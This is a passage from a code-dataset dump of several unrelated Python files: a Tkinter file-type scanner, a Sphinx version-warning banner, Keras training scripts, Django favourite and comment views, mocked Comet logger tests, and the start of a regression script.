bad_file_types[0:len(bad_file_types)]\r\n\r\n def add_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n self.known_good_filetypes.append(file_type)\r\n elif file_consensus==\"KnownBad\":\r\n self.known_bad_filetypes.append(file_type)\r\n def delete_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n file_list=self.known_good_filetypes\r\n elif file_consensus==\"KnownBad\":\r\n file_list=self.known_bad_filetypes\r\n for x in range(0,len(file_list)):\r\n if file_list[x]==file_type:\r\n del(file_list[x])\r\n break\r\n \r\n def set_directory_to_scan(self,new_directory):\r\n self.directory_to_scan=new_directory\r\n def get_directory_to_scan(self):\r\n return self.directory_to_scan\r\n\r\n def save_info_to_file(self):\r\n self.known_good_file.delete_all_file_contents()\r\n self.known_bad_file.delete_all_file_contents()\r\n for item in self.known_good_filetypes:\r\n self.known_good_file.append_line_to_file(item)\r\n for item in self.known_bad_filetypes:\r\n self.known_bad_file.append_line_to_file(item)\r\n\r\n def close_all_files(self):\r\n self.known_good_file.close_file()\r\n self.known_bad_file.close_file()\r\n\r\n\r\n\r\ndef main():\r\n application_window=AppWindow()\r\n print(\"here\")\r\n saved_information.save_info_to_file()\r\n saved_information.close_all_files()\r\nsaved_information=SavedInfo()\r\nmain()\r\n", "sub_path": "FileScanner.pyw", "file_name": "FileScanner.pyw", "file_ext": "pyw", "file_size_in_byte": 42493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "TkinterWrapper.Window", "line_number": 40, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenu", "line_number": 53, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 54, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 56, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 57, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 58, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 89, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 94, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 98, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 101, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 138, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 140, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 162, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 174, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 176, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 179, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 186, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 188, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 205, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 209, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 210, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 215, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 217, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 219, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 340, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowCanvas", "line_number": 343, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 403, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 418, "usage_type": "call"}, {"api_name": "os.path", "line_number": 418, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 485, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 508, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 509, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 510, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 517, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 520, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 530, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 534, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 536, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 542, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 546, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 551, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 562, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 576, "usage_type": "call"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 593, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 607, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 608, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 609, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 615, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 625, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 627, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 630, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 633, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 644, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 656, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 668, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 675, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 681, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 714, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 754, "usage_type": "call"}, {"api_name": "os.path", "line_number": 754, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 788, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path", "line_number": 793, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 793, "usage_type": "call"}, {"api_name": "FileWrapper.File", "line_number": 808, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 808, "usage_type": "attribute"}, {"api_name": "FileWrapper.File", "line_number": 809, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 809, "usage_type": "attribute"}]}
+{"seq_id": "151057337", "text": "# -*- coding: utf-8 -*-\n\nfrom docutils import nodes, core\nfrom munch import Munch\nimport os\n\nfrom .readthedocs import ReadTheDocsAPI\n\nUSE_READTHEDOCS_API = os.environ.get('USE_READTHEDOCS_API', False)\n\n\nclass VersionWarningBanner(object):\n\n ADMONITION_TYPES = {\n 'warning': nodes.warning,\n 'note': nodes.note,\n 'admonition': nodes.admonition,\n }\n\n def __init__(self, app, doctree):\n self.app = app\n self.doctree = doctree\n self.api = self._get_api()\n\n def get_banner_node(self):\n current_version_slug = self._current_doc_version_slug\n newest_version = self._latest_doc_version\n message = self._get_message(current_version_slug)\n banner = self._create_banner_node(message, newest_version)\n return banner\n\n def _get_api(self):\n if USE_READTHEDOCS_API:\n return ReadTheDocsAPI(self._project_slug)\n\n def _create_banner_node(self, message, newest_version, admonition_type='warning'):\n \"\"\"\n Return an admonition node to be inserted in the document.\n\n :rtype: docutils.nodes.admonition\n \"\"\"\n\n if (\n (\n (USE_READTHEDOCS_API and self.api.is_highest_version(self._current_doc_version_slug)) or\n newest_version.slug == self._current_doc_version_slug\n ) and self._current_doc_version_slug not in self.app.config.versionwarning_messages\n ):\n return None\n\n node_class = self.ADMONITION_TYPES.get(\n admonition_type,\n self.ADMONITION_TYPES.get(self._default_admonition_type),\n )\n\n if self._message_placeholder in message:\n message = message.replace(self._message_placeholder, '`{text} `_'.format(\n text=newest_version.slug,\n url=newest_version.url,\n ))\n paragraph = core.publish_doctree(message)[0]\n\n banner_node = node_class(ids=[self._banner_id_div])\n banner_node.append(paragraph)\n return banner_node\n\n @property\n def _banner_id_div(self):\n return self.app.config.versionwarning_banner_id_div\n\n @property\n def _project_slug(self):\n return self.app.config.versionwarning_project_slug\n\n @property\n def _message_placeholder(self):\n return self.app.config.versionwarning_message_placeholder\n\n @property\n def _default_admonition_type(self):\n return self.app.config.versionwarning_default_admonition_type\n\n @property\n def _current_doc_version_slug(self):\n return (\n os.environ.get('READTHEDOCS_VERSION', None) or\n self.app.config.versionwarning_project_version or\n self.app.config.version\n )\n\n @property\n def _latest_doc_version(self):\n if USE_READTHEDOCS_API:\n return self.api.newest_version()\n else:\n return Munch(\n url='.',\n slug=self._current_doc_version_slug,\n )\n\n def _get_message(self, version):\n return self.app.config.versionwarning_messages.get(\n version,\n self.app.config.versionwarning_default_message,\n )\n", "sub_path": "versionwarning/banner.py", "file_name": "banner.py", "file_ext": "py", "file_size_in_byte": 3171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "docutils.nodes.warning", "line_number": 15, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 15, "usage_type": "name"}, {"api_name": "docutils.nodes.note", "line_number": 16, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 16, "usage_type": "name"}, {"api_name": "docutils.nodes.admonition", "line_number": 17, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 17, "usage_type": "name"}, {"api_name": "readthedocs.ReadTheDocsAPI", "line_number": 34, "usage_type": "call"}, {"api_name": "docutils.core.publish_doctree", "line_number": 61, "usage_type": "call"}, {"api_name": "docutils.core", "line_number": 61, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 86, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "munch.Munch", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "464543904", "text": "# -*- coding: utf-8 -*-\nfrom re import split\nimport numpy as np\nfrom numpy.lib import index_tricks\nfrom numpy.lib.financial import rate\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential, model_from_json\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.backend import binary_crossentropy\nfrom tensorflow.python.keras.callbacks import History\nfrom tensorflow.python.keras.engine import input_layer\nfrom tensorflow.python.keras.layers.core import Flatten\nfrom sklearn import preprocessing\nos.chdir('Mycode/sotuken')\n\ndef data_shuffle(all): \n train,test = train_test_split(all,test_size=0.3)\n return train,test\n\nall = pd.read_csv(\"seikika2.csv\")\ntrain,test= data_shuffle(all)\n\nprint(train)\n'''\ndef highscore_tr():\n train = pd.read_csv(\"train90_1.csv\")\n return train\ntrain = highscore_tr()\n'''\ntrainexp = train[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\ntrainpur = train[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\nprint(trainexp)\n'trainexpを正規化'\n#trainexp = print(preprocessing.minmax_scale(trainexp,axis=1))\n#trainexp.to_csv(\"seikika.csv\")\n\n\n'モデル構築'\nmodel = Sequential([\nDense(50,activation=\"relu\",input_shape=(4,)),\nDense(20,activation='relu'),\nDense(5,activation=\"softmax\")\n])\nmodel.summary() #モデルの詳細\nadam = optimizers.Adam(lr=0.003)\nmodel.compile(optimizer=adam,\n loss='categorical_crossentropy',\n metrics=['accuracy'],\n )\n'学習実行'\nhistory = model.fit(trainexp,\n trainpur,\n batch_size=100,\n epochs=100\n )\n\n'予測'\ntest_exp = test[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\ntestpur = test[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\n\npre = model.predict(test_exp)\n#preclass = model.predict_classes(test_exp)\nprint(pre)\nprint(testpur)\n\n\nprint(history.history.keys()) #historyに格納されているキーの確認\n\n'学習曲線'\ndef learn_ploting(): \n plt.title(\"loss and accuracy\")\n plt.scatter(x=0,y=0,label=\"loss\")\n plt.scatter(x=0,y=0,label=\"accuracy\")\n plt.legend()\n plt.xlabel(\"epochs\")\n plt.ylabel(\"accuracy\")\n plt.ylabel(\"loss\")\n plt.plot(history.history[\"loss\"])\n plt.plot(history.history[\"accuracy\"])\n plt.show()\n\nlearn_ploting()\n\n", "sub_path": "Mycode/sotuken/sotuken03.py", "file_name": "sotuken03.py", "file_ext": "py", "file_size_in_byte": 2725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}]}
+{"seq_id": "471240300", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 20 17:52:02 2018\n\n@author: ashwin bhatt\n\"\"\"\n\nfrom __future__ import print_function\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras import backend as K\nfrom keras import optimizers\n\n\n\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nn_classes = 10\nn_classes = 10\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx_train = x_train.reshape(-1,28,28)\nx_test = x_test.reshape(-1,28,28)\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, n_classes)\ny_test = keras.utils.to_categorical(y_test, n_classes)\n\n#create rnn model\nmodel = Sequential()\nmodel.add(LSTM(units = 16,activation='relu',input_shape=(28,28)))\nmodel.add(Dense(n_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=keras.optimizers.RMSprop(lr=0.01),\n metrics=['accuracy'])\n\n\nmodel.summary\n\nmodel.fit(x_train,y_train,\n batch_size=100,epochs=20)\n\n\nscore = model.evaluate(x_test,y_test)\nprint('\\nTest loss:',score[0])\nprint('test accuracy:',score[1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "keras lstm.py", "file_name": "keras lstm.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 21, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 44, "usage_type": "attribute"}]}
+{"seq_id": "536342751", "text": "from django.shortcuts import render\nfrom .forms import UserAskForm, UserCommentForm\nfrom django.http import JsonResponse\nfrom .models import UserLove, UserComment\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom courses.models import CourseInfo\nfrom django.core.serializers import serialize\nfrom tools.decorators import login_decorator\n\n\n# Create your views here.\ndef user_ask(request):\n user_ask_form = UserAskForm(request.POST)\n if user_ask_form.is_valid():\n user_ask_form.save(commit=True)\n # name = user_ask_form.cleaned_data['name']\n # phone = user_ask_form.cleaned_data['phone']\n # course = user_ask_form.cleaned_data['course']\n # a = UserAsk()\n # a.name = name\n # a.phone = phone\n # a.course = course\n # a.save()\n return JsonResponse({'status': 'ok', 'msg': '咨询成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '咨询失败'})\n\n\n@login_decorator\ndef user_love(request):\n loveid = request.GET.get('loveid', '')\n lovetype = request.GET.get('lovetype', '')\n if loveid and lovetype:\n # 根据传递过来的收藏类型,判断是什么对象,根据传递过来的收藏id,判断收藏的是哪一个对象。\n obj = None\n if int(lovetype) == 1:\n obj = OrgInfo.objects.filter(id=int(loveid))[0]\n if int(lovetype) == 2:\n obj = CourseInfo.objects.filter(id=int(loveid))[0]\n if int(lovetype) == 3:\n obj = TeacherInfo.objects.filter(id=int(loveid))[0]\n\n # 如果收藏的id和type同时存在,那么我们首先要去到收藏表当中去查找有没有这个用户的这个收藏记录\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user)\n if love:\n # 如果本来已经存在收藏这个东西的记录,那么我们需要判断收藏的状态,如果收藏状态为真,代表之前收藏过,并且现在的页面上应显示的是取消收藏,代表着这次点击是为了取消收藏\n if love[0].love_status:\n love[0].love_status = False\n love[0].save()\n obj.love_num -= 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '收藏'})\n # 如果收藏状态为假,代表之前收藏过,并且又取消了收藏,并且现在的页面上应显示的是收藏,代表着这次点击是为了收藏\n else:\n love[0].love_status = True\n love[0].save()\n obj.love_num += 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '取消收藏'})\n else:\n # 如果之前没有收藏过这个东西,那么代表着表当中没有这个记录,所以,我们需要先创建这个记录对象,然后把这个记录的状态改为True\n a = UserLove()\n a.love_man = request.user\n a.love_id = int(loveid)\n a.love_type = int(lovetype)\n a.love_status = True\n a.save()\n obj.love_num += 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '取消收藏'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '收藏失败'})\n\n\ndef user_comment(request):\n user_comment_form = UserCommentForm(request.POST)\n if user_comment_form.is_valid():\n course = user_comment_form.cleaned_data['course']\n content = user_comment_form.cleaned_data['content']\n a = UserComment()\n a.comment_man = request.user\n a.comment_content = content\n a.comment_course_id = course\n a.save()\n\n # all_comments = UserComment.objects.filter(comment_course_id=course)\n #\n # all_comments = serialize('json',all_comments)\n #\n # return JsonResponse(all_comments,safe=False)\n return JsonResponse({'status': 'ok', 'msg': '评论成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '评论失败'})\n\n\ndef user_deletelove(request):\n loveid = request.GET.get('loveid', '')\n lovetype = request.GET.get('lovetype', '')\n if loveid and lovetype:\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user,\n love_status=True)\n if love:\n love[0].love_status = False\n love[0].save()\n return JsonResponse({'status': 'ok', 'msg': '取消成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '取消失败'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '取消失败'})\n", "sub_path": "GuLiEdu/apps/operations/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.UserAskForm", "line_number": 13, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "orgs.models.OrgInfo", "line_number": 37, "usage_type": "name"}, {"api_name": "courses.models.CourseInfo.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "courses.models.CourseInfo.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "courses.models.CourseInfo", "line_number": 39, "usage_type": "name"}, {"api_name": "orgs.models.TeacherInfo.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "orgs.models.TeacherInfo.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "orgs.models.TeacherInfo", "line_number": 41, "usage_type": "name"}, {"api_name": "models.UserLove.objects.filter", "line_number": 44, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 44, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "models.UserLove", "line_number": 62, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 72, "usage_type": "call"}, {"api_name": "tools.decorators.login_decorator", "line_number": 29, "usage_type": "name"}, {"api_name": "forms.UserCommentForm", "line_number": 76, "usage_type": "call"}, {"api_name": "models.UserComment", "line_number": 80, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 91, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "models.UserLove.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 100, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 105, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 107, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 109, "usage_type": "call"}]}
+{"seq_id": "605026960", "text": "from unittest.mock import patch\n\nimport pytest\n\nfrom pytorch_lightning.loggers import CometLogger\nfrom pytorch_lightning.utilities.exceptions import MisconfigurationException\n\n\ndef test_comet_logger_online():\n \"\"\"Test comet online with mocks.\"\"\"\n # Test api_key given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test both given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n save_dir='test',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test neither given\n with pytest.raises(MisconfigurationException):\n CometLogger(\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test already exists\n with patch('pytorch_lightning.loggers.comet.CometExistingExperiment') as comet_existing:\n logger = CometLogger(\n experiment_key='test',\n experiment_name='experiment',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet_existing.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n previous_experiment='test'\n )\n\n comet_existing().set_name.assert_called_once_with('experiment')\n\n with patch('pytorch_lightning.loggers.comet.API') as api:\n CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n rest_api_key='rest'\n )\n\n api.assert_called_once_with('rest')\n", "sub_path": "tests/loggers/test_comet.py", "file_name": "test_comet.py", "file_ext": "py", "file_size_in_byte": 2197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 28, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 45, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.exceptions.MisconfigurationException", "line_number": 45, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 52, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 53, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 72, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 73, "usage_type": "call"}]}
+{"seq_id": "134748082", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 07:08:30 2018\r\n\r\n@author: mpagrawa\r\n\"\"\"\r\n\r\n#import house_11112018 as parent\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sqlalchemy as sql\r\nimport statsmodels.formula.api as sm\r\nimport scipy.stats as stats\r\n\r\nfrom sklearn import preprocessing\r\n\r\nfrom sqlalchemy import create_engine\r\nengine = create_engine('sqlite://', echo=False)\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly = PolynomialFeatures(2)\r\n\r\n#%matplotlib inline\r\nsns.set_style('whitegrid')\r\n\r\ndef StartOverDf():\r\n house = pd.read_csv('kc_house_data.csv', parse_dates=['date'])\r\n del house['id']\r\n del house['lat']\r\n del house['long']\r\n return house\r\n\r\ndef AdjustedRSquare(model,X,Y):\r\n YHat = model.predict(X)\r\n n,k = X.shape\r\n sse = np.sum(np.square(YHat-Y),axis=0)\r\n sst = np.sum(np.square(Y-np.mean(Y)),axis=0)\r\n R2 = 1- sse/sst\r\n adjR2 = R2-(1-R2)*(float(k)/(n-k-1))\r\n return adjR2\r\n\r\ndef BackwardElimination(X,y,sl):\r\n columnList = X.columns.tolist() \r\n for i in range(0, len(columnList)):\r\n regressor_OLS = sm.OLS(y, X[columnList]).fit()\r\n adjR2_before = regressor_OLS.rsquared_adj \r\n maxVar = max(regressor_OLS.pvalues) \r\n if maxVar > sl:\r\n ind = regressor_OLS.pvalues[regressor_OLS.pvalues == max(regressor_OLS.pvalues)].index[0]\r\n columnList_new = columnList.copy()\r\n columnList_new.remove(ind)\r\n temp_OLS = 